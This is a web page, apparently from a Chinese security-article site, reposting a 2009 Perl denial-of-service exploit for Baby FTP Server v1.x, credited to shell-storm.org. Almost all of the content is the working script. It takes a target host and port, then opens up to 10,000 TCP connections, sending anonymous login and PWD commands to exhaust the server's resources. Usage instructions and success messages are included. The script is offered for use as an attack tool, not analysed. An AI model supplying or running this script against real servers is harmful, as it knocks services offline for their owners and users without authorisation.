Baby FTP server version 1.x remote memory consumption exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Baby FTP server version 1.x remote memory consumption exploit

来源：http://www.shell-storm.org/ 作者：Salwan 发布时间：2009-04-07

#!/usr/bin/perl
#
# Baby FTP Server v1.x Remote Memory Consumption Exploit.
#
# -------------------------------------------------------
# This can be exploited to use 100% UC.
# Tested with Windows xp sp2
# -------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org


use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft   : Baby FTP Server v1.x\n";
print "[+] Exploit: Remote Memory Consumption Exploit\n\n";

	if (@ARGV < 1)
		{
 		print "[-] Usage: <file.pl> <host> <port>\n";
 		print "[-] Exemple: file.pl 127.0.0.1 21\n";
 		exit;
		}

	$ip = $ARGV[0];
	$port = $ARGV[1];

print "[+] Sending request...\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";

for($i=0;$i<10000;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[+]Done! $ip => 100% UC used\n";

	print $socket "USER anonymous\r\n";
	print $socket "PASS a\r\n";
	print $socket "PWD\r\n";

close($socket);
}
print "[+]Done! $ip => 100% UC used\n";

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告